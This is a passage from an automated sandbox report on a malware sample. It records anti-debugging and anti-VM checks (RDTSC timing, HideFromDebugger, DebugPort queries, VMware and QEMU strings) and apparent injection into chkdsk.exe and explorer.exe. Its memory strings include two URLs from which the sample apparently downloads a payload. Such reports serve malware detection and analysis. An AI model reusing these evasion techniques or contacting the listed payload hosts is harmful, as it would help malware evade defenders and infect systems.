      Source: C:\Users\user\Desktop\F63V4i8eZU.exeRDTSC instruction interceptor: First address: 00000000005677CE second address: 00000000005677CE instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e mov eax, 13311C4Bh 0x00000013 sub eax, 1A8CF406h 0x00000018 add eax, EA75BF22h 0x0000001d sub eax, E319E766h 0x00000022 cpuid 0x00000024 jmp 00007EFE34D2B39Ah 0x00000026 cmp bh, dh 0x00000028 bt ecx, 1Fh 0x0000002c jc 00007EFE34D2B971h 0x00000032 test dh, dh 0x00000034 popad 0x00000035 cmp cx, bx 0x00000038 call 00007EFE34D2B4BBh 0x0000003d lfence 0x00000040 rdtsc
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeRDTSC instruction interceptor: First address: 0000000000566C24 second address: 0000000000566C24 instructions:
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeRDTSC instruction interceptor: First address: 0000000000565B7B second address: 0000000000565BB6 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a cmp edx, ebx 0x0000000c test eax, eax 0x0000000e je 00007EFE34D2B700h 0x00000014 pushad 0x00000015 mov dl, 95h 0x00000017 cmp dl, FFFFFF95h 0x0000001a jne 00007EFE34D2EAEFh 0x00000020 popad 0x00000021 mov dword ptr [ebp+000000E8h], eax 0x00000027 fnop 0x00000029 test bh, ch 0x0000002b mov eax, ebp 0x0000002d add eax, 00000100h 0x00000032 test ecx, edx 0x00000034 mov dword ptr [eax], 4FD2ADFDh 0x0000003a pushad 0x0000003b rdtsc
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeRDTSC instruction interceptor: First address: 0000000000565BB6 second address: 0000000000565BED instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a cmp edx, ebx 0x0000000c add dword ptr [eax], B8DD5D9Fh 0x00000012 pushad 0x00000013 mov dl, 11h 0x00000015 cmp dl, 00000011h 0x00000018 jne 00007EFE34BE0586h 0x0000001e popad 0x0000001f sub dword ptr [eax], 2B06605Eh 0x00000025 xor dword ptr [eax], DDA9ACEEh 0x0000002b fnop 0x0000002d test bh, ch 0x0000002f push 8402AFE5h 0x00000034 test ecx, edx 0x00000036 pushad 0x00000037 rdtsc
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeRDTSC instruction interceptor: First address: 0000000000565BED second address: 0000000000565BED instructions:
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeRDTSC instruction interceptor: First address: 0000000000562B1D second address: 0000000000562B73 instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 sub dword ptr [esp], E6F9D83Bh 0x0000000a test ch, dh 0x0000000c xor dword ptr [esp], A6CD49A4h 0x00000013 cmp cx, cx 0x00000016 mov eax, dword ptr [ebp+20h] 0x00000019 add eax, ebx 0x0000001b mov dword ptr [ebp+000001F5h], ecx 0x00000021 mov ecx, eax 0x00000023 push ecx 0x00000024 mov ecx, dword ptr [ebp+000001F5h] 0x0000002a pushad 0x0000002b mov ah, 76h 0x0000002d cmp ah, 00000076h 0x00000030 jne 00007EFE34BDE24Fh 0x00000036 popad 0x00000037 cmp ah, bh 0x00000039 mov dword ptr [ebp+0000027Ah], ebx 0x0000003f test edx, ecx 0x00000041 mov ebx, esi 0x00000043 push ebx 0x00000044 test esi, 05CEFCD7h 0x0000004a mov ebx, dword ptr [ebp+0000027Ah] 0x00000050 pushad 0x00000051 mov ebx, 000000D7h 0x00000056 rdtsc
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeRDTSC instruction interceptor: First address: 0000000000562BCB second address: 0000000000562BCB instructions:
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeRDTSC instruction interceptor: First address: 0000000000563C85 second address: 0000000000563F54 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a sub edx, 22E6120Ah 0x00000010 xor edx, 256ED0EBh 0x00000016 cmp ax, 0000EAB4h 0x0000001a cmp dword ptr [esi+24h], edx 0x0000001d mov edx, dword ptr [ebp+00000273h] 0x00000023 je 00007EFE34BDD0C7h 0x00000029 mov ebx, 263052C4h 0x0000002e cmp dx, ax 0x00000031 xor ebx, B0E6794Fh 0x00000037 add ebx, 61B5A210h 0x0000003d pushad 0x0000003e rdtsc
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeRDTSC instruction interceptor: First address: 0000000000563F54 second address: 0000000000563F54 instructions:
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeRDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeRDTSC instruction interceptor: First address: 0000000000409B4E second address: 0000000000409B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Windows\SysWOW64\chkdsk.exeRDTSC instruction interceptor: First address: 0000000000C298E4 second address: 0000000000C298EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Windows\SysWOW64\chkdsk.exeRDTSC instruction interceptor: First address: 0000000000C29B4E second address: 0000000000C29B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A5852 rdtsc
      Source: C:\Windows\explorer.exe TID: 5236Thread sleep count: 146 > 30
      Source: C:\Windows\explorer.exe TID: 5236Thread sleep time: -292000s >= -30000s
      Source: C:\Windows\SysWOW64\chkdsk.exe TID: 1156Thread sleep count: 67 > 30
      Source: C:\Windows\SysWOW64\chkdsk.exe TID: 1156Thread sleep time: -335000s >= -30000s
      Source: C:\Windows\explorer.exeLast function: Thread delayed
      Source: C:\Windows\explorer.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: explorer.exe, 0000001D.00000000.447733295.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
      Source: explorer.exe, 0000001D.00000000.447733295.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
      Source: explorer.exe, 0000001D.00000000.446760179.0000000008220000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
      Source: explorer.exe, 0000001D.00000000.447365137.0000000008640000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
      Source: F63V4i8eZU.exe, 00000000.00000002.316897484.0000000002B80000.00000004.00000001.sdmpBinary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exeMsi.dllPublishershell32advapi32TEMP=windir=\syswow64\msvbvm60.dll
      Source: F63V4i8eZU.exe, 00000012.00000002.475431458.00000000006F0000.00000004.00000001.sdmpBinary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exeMsi.dllPublishershell32advapi32TEMP=https://kinmirai.org/wp-content/bin_QVwEr224.binhttp://farmersschool.ge/bin_QVwEr224.binwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
      Source: explorer.exe, 0000001D.00000000.462940046.00000000055D0000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}V*(E
      Source: explorer.exe, 0000001D.00000000.447733295.000000000871F000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
      Source: explorer.exe, 0000001D.00000000.447733295.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
      Source: explorer.exe, 0000001D.00000000.447868275.00000000087D1000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00ices
      Source: explorer.exe, 0000001D.00000000.462987107.0000000005603000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
      Source: explorer.exe, 0000001D.00000000.446760179.0000000008220000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
      Source: F63V4i8eZU.exe, 00000000.00000002.316897484.0000000002B80000.00000004.00000001.sdmp, F63V4i8eZU.exe, 00000012.00000002.475431458.00000000006F0000.00000004.00000001.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
      Source: explorer.exe, 0000001D.00000000.446760179.0000000008220000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
      Source: explorer.exe, 0000001D.00000000.446760179.0000000008220000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeProcess information queried: ProcessInformation

      Anti Debugging:

      barindex
      Hides threads from debuggersShow sources
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeThread information set: HideFromDebugger
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeThread information set: HideFromDebugger
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeThread information set: HideFromDebugger
      Potentially malicious time measurement code foundShow sources
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A5852 Start: 022A4BE7 End: 022A480D
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A045E Start: 022A4BE7 End: 022A480D
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A8DB4 Start: 022A4BE7 End: 022A480D
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A423F Start: 022A4BE7 End: 022A480D
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A4263 Start: 022A4BE7 End: 022A480D
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A4277 Start: 022A4BE7 End: 022A480D
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A5A46 Start: 022A5BED End: 022A480D
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A33A7 Start: 022A4BE7 End: 022A480D
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A4128 Start: 022A4BE7 End: 022A480D
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A513E Start: 022A4BE7 End: 022A480D
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A46E4 Start: 022A4BE7 End: 022A480D
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A1FD9 Start: 022A4BE7 End: 022A480D
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A7CA5 Start: 022A4BE7 End: 022A480D
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A7488 Start: 022A4BE7 End: 022A480D
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeProcess queried: DebugPort
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeProcess queried: DebugPort
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeProcess queried: DebugPort
      Source: C:\Windows\SysWOW64\chkdsk.exeProcess queried: DebugPort
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A5852 rdtsc
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A6320 LdrInitializeThunk,
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A5201 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A7365 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A33A7 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A33EC mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A28E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A7EFC mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A348A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A6D92 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E47AE44 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E47AE44 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E47EA55 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E444257 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3F4A2C mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3F4A2C mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3BE620 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3D3A1C mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3EA61C mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3EA61C mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E46B260 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E46B260 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E488A62 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3B5210 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3B5210 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3B5210 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3B5210 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3BAA16 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3BAA16 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3C8A0A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3BC600 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3BC600 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3BC600 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3E8E00 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3F927A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3DAE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3DAE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3DAE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3DAE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3DAE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E471608 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3C766D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E46FE3F mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3B9240 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3B9240 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3B9240 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3B9240 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3C7E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3C7E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3C7E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3C7E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3C7E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3C7E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E46FEC0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3CAAB0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3CAAB0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3EFAB0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3B52A5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3B52A5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3B52A5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3B52A5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3B52A5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E488ED6 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3ED294 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3ED294 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E44FE87 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3E2AE4 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3E16E0 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3C76E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E4346A7 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E480EA5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E480EA5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E480EA5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3E36CC mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3E2ACB mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3F8EC7 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3EE730 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E488B58 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3B4F2E mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3B4F2E mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E488F6A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3DF716 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3EA70E mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3EA70E mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3E3B7A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3E3B7A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E48070D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E48070D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E44FF10 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E44FF10 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3BDB60 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E47131B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3CFF60 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3BF358 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3BDB40 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3CEF40 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E4353CA mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E4353CA mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3E4BAD mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3E4BAD mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3E4BAD mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3C8794 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3E2397 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3EB390 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3C1B8F mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3C1B8F mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E46D380 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3F37F5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E47138A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3DDBE9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E437794 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E437794 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E437794 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3E03E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3E03E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3E03E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3E03E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3E03E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3E03E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E485BA5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3EBC2C mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3E002D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3E002D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3E002D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3E002D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3E002D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E44C450 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E44C450 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3CB02A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3CB02A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3CB02A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3CB02A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E472073 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E481074 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E471C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E471C06 mov eax, dword ptr fs:[00000030h]
